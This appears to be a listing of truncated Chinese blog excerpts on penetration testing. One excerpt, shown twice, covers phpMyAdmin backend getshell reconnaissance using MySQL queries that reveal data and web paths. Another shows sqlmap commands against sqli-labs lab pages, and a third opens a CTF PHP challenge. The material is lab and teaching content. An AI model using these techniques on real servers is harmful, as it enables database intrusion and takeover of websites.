phpmyadmin 后台 getshell 及漏洞利用思路整理
0x01 信息收集思路 1. 网站绝对路径 1.1 mysql路径 如果是类似phpstudy这样的集成工具,那么查询出mysql路径也就可以找到网站路径了。 select version(); -- 查看数据库版本 select @@datadir; -- 查看数据库存储路径 show VARIABLES like '%char%'; -- 查看系统变量 show varia...
0x01 信息收集思路 1. 网站绝对路径 1.1 mysql路径 如果是类似phpstudy这样的集成工具,那么查询出mysql路径也就可以找到网站路径了。 select version(); -- 查看数据库版本 select @@datadir; -- 查看数据库存储路径 show VARIABLES like '%char%'; -- 查看系统变量 show varia...
less1 sqlmap -u http://192.168.133.162/sql/Less-1/index.php?id=1 --batch --dbs less2 sqlmap -u http://192.168.133.162/sql/Less-2/index.php?id=1 --batch --dbs less3 sqlmap -u http://192.168.1...
web1:easyphp <?php //题目环境:php:7.4.8-apache $pid = pcntl_fork(); if ($pid == -1) { die('could not fork'); }else if ($pid){ $r=pcntl_wait($status); //父进程等待子进程退出才会执...